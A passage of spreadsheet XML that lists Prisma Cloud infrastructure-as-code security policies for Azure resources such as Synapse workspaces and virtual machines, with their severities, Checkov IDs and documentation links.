      </c>
      <c r="L941" t="inlineStr"/>
      <c r="M941" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N941" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O941" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P941" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q941" t="inlineStr"/>
      <c r="R941" t="inlineStr"/>
      <c r="S941" t="inlineStr"/>
      <c r="T941" t="b">
        <v>0</v>
      </c>
      <c r="U941" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V941" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-sql-pool</t>
        </is>
      </c>
      <c r="W941" t="inlineStr">
        <is>
          <t>Ensure Synapse SQL pools are encrypted</t>
        </is>
      </c>
      <c r="X941" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-241</t>
        </is>
      </c>
      <c r="Y941" t="inlineStr"/>
      <c r="Z941" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_sql_pool"]}</t>
        </is>
      </c>
      <c r="AA941" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB941" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC941" t="inlineStr">
        <is>
          <t>CKV_AZURE_241</t>
        </is>
      </c>
      <c r="AD941" t="b">
        <v>1</v>
      </c>
      <c r="AE941" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF941" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>a63251ce-dda8-406f-92b0-2adb43767a15</t>
        </is>
      </c>
      <c r="AI941" t="inlineStr"/>
      <c r="AJ941" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK941" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" t="inlineStr"/>
      <c r="B942" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C942" s="2" t="inlineStr"/>
      <c r="D942" t="inlineStr"/>
      <c r="E942" t="inlineStr"/>
      <c r="F942" t="inlineStr"/>
      <c r="G942" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J942" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K942" t="inlineStr">
        <is>
          <t>Azure Data exfiltration protection for Azure Synapse workspace is disabled</t>
        </is>
      </c>
      <c r="L942" t="inlineStr"/>
      <c r="M942" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N942" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O942" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P942" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q942" t="inlineStr"/>
      <c r="R942" t="inlineStr"/>
      <c r="S942" t="inlineStr"/>
      <c r="T942" t="b">
        <v>0</v>
      </c>
      <c r="U942" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V942" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W942" t="inlineStr">
        <is>
          <t>Ensure that Synapse workspace has data_exfiltration_protection_enabled</t>
        </is>
      </c>
      <c r="X942" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled</t>
        </is>
      </c>
      <c r="Y942" t="inlineStr"/>
      <c r="Z942" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA942" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB942" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC942" t="inlineStr">
        <is>
          <t>CKV_AZURE_157</t>
        </is>
      </c>
      <c r="AD942" t="b">
        <v>1</v>
      </c>
      <c r="AE942" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF942" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>f830d321-b08f-43b7-ba6f-0367b65b08e7</t>
        </is>
      </c>
      <c r="AI942" t="inlineStr"/>
      <c r="AJ942" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK942" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" t="inlineStr"/>
      <c r="B943" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C943" s="2" t="inlineStr"/>
      <c r="D943" t="inlineStr"/>
      <c r="E943" t="inlineStr"/>
      <c r="F943" t="inlineStr"/>
      <c r="G943" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J943" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K943" t="inlineStr">
        <is>
          <t>Azure Synapse workspace administrator login password exposed</t>
        </is>
      </c>
      <c r="L943" t="inlineStr"/>
      <c r="M943" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N943" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O943" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P943" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q943" t="inlineStr"/>
      <c r="R943" t="inlineStr"/>
      <c r="S943" t="inlineStr"/>
      <c r="T943" t="b">
        <v>0</v>
      </c>
      <c r="U943" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V943" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W943" t="inlineStr">
        <is>
          <t>This policy detects whether the administrator login password for an Azure Synapse workspace is exposed, checking for any instances where the password might be publicly accessible or improperly stored.</t>
        </is>
      </c>
      <c r="X943" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-secrets-policies/bc-azure-239</t>
        </is>
      </c>
      <c r="Y943" t="inlineStr"/>
      <c r="Z943" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA943" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB943" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC943" t="inlineStr">
        <is>
          <t>CKV_AZURE_239</t>
        </is>
      </c>
      <c r="AD943" t="b">
        <v>1</v>
      </c>
      <c r="AE943" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF943" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>183798ac-ef49-4e47-b192-e685fd7ddb2b</t>
        </is>
      </c>
      <c r="AI943" t="inlineStr"/>
      <c r="AJ943" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK943" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" t="inlineStr"/>
      <c r="B944" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C944" s="2" t="inlineStr"/>
      <c r="D944" t="inlineStr"/>
      <c r="E944" t="inlineStr"/>
      <c r="F944" t="inlineStr"/>
      <c r="G944" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J944" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K944" t="inlineStr">
        <is>
          <t>Azure Synapse Workspace not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L944" t="inlineStr"/>
      <c r="M944" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N944" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O944" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P944" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q944" t="inlineStr"/>
      <c r="R944" t="inlineStr"/>
      <c r="S944" t="inlineStr"/>
      <c r="T944" t="b">
        <v>0</v>
      </c>
      <c r="U944" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V944" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W944" t="inlineStr">
        <is>
          <t>Ensure Azure Synapse Workspace is encrypted with a CMK</t>
        </is>
      </c>
      <c r="X944" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-240</t>
        </is>
      </c>
      <c r="Y944" t="inlineStr"/>
      <c r="Z944" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA944" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB944" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC944" t="inlineStr">
        <is>
          <t>CKV_AZURE_240</t>
        </is>
      </c>
      <c r="AD944" t="b">
        <v>1</v>
      </c>
      <c r="AE944" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF944" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>5e212f99-d52c-4546-b498-4ba6043ddaa2</t>
        </is>
      </c>
      <c r="AI944" t="inlineStr"/>
      <c r="AJ944" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK944" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" t="inlineStr"/>
      <c r="B945" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C945" s="2" t="inlineStr"/>
      <c r="D945" t="inlineStr"/>
      <c r="E945" t="inlineStr"/>
      <c r="F945" t="inlineStr"/>
      <c r="G945" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J945" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual</t>
        </is>
      </c>
      <c r="K945" t="inlineStr">
        <is>
          <t>Azure Virtual Machines does not utilise Managed Disks</t>
        </is>
      </c>
      <c r="L945" t="inlineStr"/>
      <c r="M945" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N945" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O945" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P945" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q945" t="inlineStr"/>
      <c r="R945" t="inlineStr"/>
      <c r="S945" t="inlineStr"/>
      <c r="T945" t="b">
        <v>0</v>
      </c>
      <c r="U945" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V945" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual-machine</t>
        </is>
      </c>
      <c r="W945" t="inlineStr">
        <is>
          <t>Ensure Virtual Machines are utilizing Managed Disks</t>
        </is>
      </c>
      <c r="X945" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks</t>
        </is>
      </c>
      <c r="Y945" t="inlineStr"/>
      <c r="Z945" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA945" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB945" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC945" t="inlineStr">
        <is>
          <t>CKV2_AZURE_9</t>
        </is>
      </c>
      <c r="AD945" t="b">
        <v>1</v>
      </c>
      <c r="AE945" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF945" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>a7e903d3-c051-48ec-acae-c4ce21362155</t>
        </is>
      </c>
      <c r="AI945" t="inlineStr"/>
      <c r="AJ945" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK945" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" t="inlineStr"/>
      <c r="B946" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C946" s="2" t="inlineStr"/>
      <c r="D946" t="inlineStr"/>
      <c r="E946" t="inlineStr"/>
      <c r="F946" t="inlineStr"/>
      <c r="G946" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J946" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual</t>
        </is>
      </c>
      <c r="K946" t="inlineStr">
        <is>
          <t>Unattached disks are not encrypted</t>
        </is>
      </c>
      <c r="L946" t="inlineStr"/>
      <c r="M946" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N946" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O946" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P946" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q946" t="inlineStr"/>
      <c r="R946" t="inlineStr"/>
      <c r="S946" t="inlineStr"/>
      <c r="T946" t="b">
        <v>0</v>
      </c>
      <c r="U946" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V946" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual-machine,azure-managed-disk</t>
        </is>
      </c>
      <c r="W946" t="inlineStr">
        <is>
          <t>Ensure that Unattached disks are encrypted</t>
        </is>
      </c>
      <c r="X946" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted</t>
        </is>
      </c>
      <c r="Y946" t="inlineStr"/>
      <c r="Z946" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_virtual_machine","azurerm_managed_disk"]}</t>
        </is>
      </c>
      <c r="AA946" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB946" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC946" t="inlineStr">
        <is>
          <t>CKV2_AZURE_14</t>
        </is>
      </c>
      <c r="AD946" t="b">
        <v>1</v>
      </c>
      <c r="AE946" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF946" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>6cf0b2e7-dae3-4649-8431-54c2c1e350db</t>
        </is>
      </c>
      <c r="AI946" t="inlineStr"/>
      <c r="AJ946" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK946" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" t="inlineStr"/>
      <c r="B947" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C947" s="2" t="inlineStr"/>
      <c r="D947" t="inlineStr"/>
      <c r="E947" t="inlineStr"/>
      <c r="F947" t="inlineStr"/>
      <c r="G947" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J947" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual</t>
        </is>
      </c>
      <c r="K947" t="inlineStr">
        <is>
          <t>Microsoft Antimalware is not configured to automatically update Virtual Machines</t>
        </is>
      </c>
      <c r="L947" t="inlineStr"/>
      <c r="M947" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N947" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O947" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P947" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q947" t="inlineStr"/>
      <c r="R947" t="inlineStr"/>
      <c r="S947" t="inlineStr"/>
      <c r="T947" t="b">
        <v>0</v>
      </c>
      <c r="U947" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V947" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual-machine,azure-virtual-machine-extension</t>
        </is>
      </c>
      <c r="W947" t="inlineStr">
        <is>
          <t>Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines</t>
        </is>
      </c>
      <c r="X947" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines</t>
        </is>
      </c>
      <c r="Y947" t="inlineStr"/>
      <c r="Z947" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_virtual_machine","azurerm_virtual_machine_extension"]}</t>
        </is>
      </c>
      <c r="AA947" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB947" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC947" t="inlineStr">
        <is>
          <t>CKV2_AZURE_10</t>
        </is>
      </c>
      <c r="AD947" t="b">
        <v>1</v>
      </c>
      <c r="AE947" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF947" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>1a58fc83-8975-442f-8448-ec3f00893de8</t>
        </is>
      </c>
      <c r="AI947" t="inlineStr"/>
      <c r="AJ947" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK947" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" t="inlineStr"/>
      <c r="B948" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C948" s="2" t="inlineStr"/>
      <c r="D948" t="inlineStr"/>
      <c r="E948" t="inlineStr"/>
      <c r="F948" t="inlineStr"/>
      <c r="G948" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J948" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual</t>
        </is>
      </c>
      <c r="K948" t="inlineStr">
        <is>
          <t>Automatic OS image patching is disabled for Virtual Machine scale sets</t>
        </is>
      </c>
      <c r="L948" t="inlineStr"/>
      <c r="M948" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N948" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O948" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P948" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q948" t="inlineStr"/>
      <c r="R948" t="inlineStr"/>
      <c r="S948" t="inlineStr"/>
      <c r="T948" t="b">
        <v>0</v>
      </c>
      <c r="U948" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V948" t="inlineStr">
        <is>
          <t>IaC:General:azure-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W948" t="inlineStr">
        <is>
          <t>Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets</t>
        </is>
      </c>
      <c r="X948" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets</t>
        </is>
      </c>
      <c r="Y948" t="inlineStr"/>
      <c r="Z948" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA948" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB948" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC948" t="inlineStr">
        <is>
          <t>CKV_AZURE_95</t>
        </is>
      </c>
      <c r="AD948" t="b">
        <v>1</v>
      </c>
      <c r="AE948" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF948" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>a7575f87-132a-44f9-bb75-a32c8fede437</t>
        </is>
      </c>
      <c r="AI948" t="inlineStr"/>
      <c r="AJ948" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK948" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" t="inlineStr"/>
      <c r="B949" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C949" s="2" t="inlineStr"/>
      <c r="D949" t="inlineStr"/>
      <c r="E949" t="inlineStr"/>
      <c r="F949" t="inlineStr"/>
      <c r="G949" t="b">
        <v>1</v>
      </c>
      <c r="H9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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J949" t="inlineStr">
        <is>
          <t>IaC:General:azure-web</t>
        </is>
      </c>
      <c r="K949" t="inlineStr">
        <is>
          <t>Web PubSub Without SLA SKU</t>
        </is>
      </c>
      <c r="L949" t="inlineStr"/>
      <c r="M949" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N949" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O949" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P949" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q949" t="inlineStr"/>
      <c r="R949" t="inlineStr"/>
      <c r="S949" t="inlineStr"/>
      <c r="T949" t="b">
        <v>0</v>
      </c>
      <c r="U949" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V949" t="inlineStr">
        <is>
          <t>IaC:General:azure-web-pubsub</t>
        </is>
      </c>
      <c r="W949" t="inlineStr">
        <is>
          <t>Ensure Web PubSub uses a SKU with an SLA</t>
        </is>
      </c>
      <c r="X949" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-175</t>
        </is>
      </c>
      <c r="Y949" t="inlineStr"/>
      <c r="Z949" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_web_pubsub"]}</t>
        </is>
      </c>
      <c r="AA949" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB949" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC949" t="inlineStr">
        <is>
          <t>CKV_AZURE_175</t>
        </is>
      </c>
      <c r="AD949" t="b">
        <v>1</v>
      </c>
      <c r="AE949" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF949" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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49" t="inlineStr">
        <is>
          <t>774008d3-1c0a-4a30-af0d-fbfc79560ead</t>
        </is>
      </c>
      <c r="AI949" t="inlineStr"/>
      <c r="AJ949" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK949" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" t="inlineStr"/>
      <c r="B950" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C950" s="2" t="inlineStr"/>
      <c r="D950" t="inlineStr"/>
      <c r="E950" t="inlineStr"/>
      <c r="F950" t="inlineStr"/>
      <c r="G950" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J950" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows</t>
        </is>
      </c>
      <c r="K950" t="inlineStr">
        <is>
          <t>Azure Windows VM does not enable encryption</t>
        </is>
      </c>
      <c r="L950" t="inlineStr"/>
      <c r="M950" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N950" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O950" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P950" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q950" t="inlineStr"/>
      <c r="R950" t="inlineStr"/>
      <c r="S950" t="inlineStr"/>
      <c r="T950" t="b">
        <v>0</v>
      </c>
      <c r="U950" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V950" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows-virtual-machine</t>
        </is>
      </c>
      <c r="W950" t="inlineStr">
        <is>
          <t>Ensure Windows VM enables encryption</t>
        </is>
      </c>
      <c r="X950" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption</t>
        </is>
      </c>
      <c r="Y950" t="inlineStr"/>
      <c r="Z950" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_windows_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA950" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB950" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC950" t="inlineStr">
        <is>
          <t>CKV_AZURE_151</t>
        </is>
      </c>
      <c r="AD950" t="b">
        <v>1</v>
      </c>
      <c r="AE950" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF950" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>7fec314c-d8db-4e40-bef9-5e1cdd71db5b</t>
        </is>
      </c>
      <c r="AI950" t="inlineStr"/>
      <c r="AJ950" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK950" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" t="inlineStr"/>
      <c r="B951" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C951" s="2" t="inlineStr"/>
      <c r="D951" t="inlineStr"/>
      <c r="E951" t="inlineStr"/>
      <c r="F951" t="inlineStr"/>
      <c r="G951" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J951" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows</t>
        </is>
      </c>
      <c r="K951" t="inlineStr">
        <is>
          <t>Windows VM Without Automatic Updates</t>
        </is>
      </c>
      <c r="L951" t="inlineStr"/>
      <c r="M951" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N951" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O951" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P951" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q951" t="inlineStr"/>
      <c r="R951" t="inlineStr"/>
      <c r="S951" t="inlineStr"/>
      <c r="T951" t="b">
        <v>0</v>
      </c>
      <c r="U951" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V951" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows-virtual-machine,azure-windows-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W951" t="inlineStr">
        <is>
